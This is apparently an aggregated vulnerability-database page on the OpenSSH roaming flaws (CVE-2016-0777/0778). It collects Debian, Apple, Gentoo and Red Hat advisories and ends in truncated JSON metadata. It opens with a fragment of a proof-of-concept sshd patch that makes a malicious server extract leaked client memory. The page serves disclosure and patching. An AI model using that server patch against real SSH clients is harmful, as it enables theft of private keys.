packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;
if (options.rekey_limit || options.rekey_interval)
packet_set_rekey_limits((u_int32_t)options.rekey_limit,
.
More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.
For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.
For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002
OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:
apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team
AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team
AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB
Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher
dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. CVE-ID CVE-2016-1738 : beist and ABH of BoB
FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero
IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash
IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE----- .
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.1_p2 >= 7.1_p2
Description
Qualys have reported two issues in the "roaming" code included in the OpenSSH client, which provides undocumented, experimental support for resuming SSH connections. Users with private keys that are not protected by a passphrase are advised to generate new keys if they have connected to an SSH server they don't fully trust. To do so, add "UseRoaming no" to the SSH client configuration, or specify "-o 'UseRoaming no'" on the command line.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-7.1_p2"
References
[ 1 ] CVE-2016-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777 [ 2 ] CVE-2016-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201601-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security update Advisory ID: RHSA-2016:0043-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html Issue date: 2016-01-14 CVE Names: CVE-2016-0777 CVE-2016-0778 =====================================================================
- Summary:
Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. (CVE-2016-0778)
Red Hat would like to thank Qualys for reporting these issues.
All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
ppc64: openssh-6.6.1p1-23.el7_2.ppc64.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-6.6.1p1-23.el7_2.ppc64.rpm
ppc64le: openssh-6.6.1p1-23.el7_2.ppc64le.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-6.6.1p1-23.el7_2.ppc64le.rpm
s390x: openssh-6.6.1p1-23.el7_2.s390x.rpm openssh-askpass-6.6.1p1-23.el7_2.s390x.rpm openssh-clients-6.6.1p1-23.el7_2.s390x.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-keycat-6.6.1p1-23.el7_2.s390x.rpm openssh-server-6.6.1p1-23.el7_2.s390x.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm
ppc64le: openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm
s390x: openssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-ldap-6.6.1p1-23.el7_2.s390x.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0777 https://access.redhat.com/security/cve/CVE-2016-0778 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/articles/2123781
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo nXgYWs8cZcyoTRVoriTGHQo= =1sk9 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0030", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "unified threat management software", "scope": "eq", "trust": 1.6, "vendor": "sophos", "version": "9.353" }, { "model": "linux", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "7" }, { "model": "solaris", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "11.3" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.11.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.1" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.6" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.6" }, { "model": "virtual customer access system", "scope": "lte", "trust": 1.0, "vendor": "hp", "version": "15.07" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.8" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.0" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.10.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.8" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.2" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.3" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.4" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.9" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.7" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "7.1" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.9.0" }, { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "5.5" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.9" }, { "model": "mac os x", "scope": "gte", "trust": 1.0, "vendor": "apple", "version": "10.10.0" }, { "model": "openssh", "scope": "eq", "trust": 1.0, "vendor": "openbsd", "version": "6.4" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "debian gnu linux", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "hardened bsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openbsd", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openssh", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ubuntu", "version": null }, { "model": "openssh", "scope": "lt", "trust": 0.8, "vendor": "openbsd", "version": "7.x" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "5.x" }, { "model": "utm software", "scope": null, "trust": 0.8, "vendor": "sophos", "version": null }, { "model": "linux", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.8, "vendor": "openbsd", "version": "6.x" }, { "model": "hpe remote device access: virtual customer access system", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "openssh", 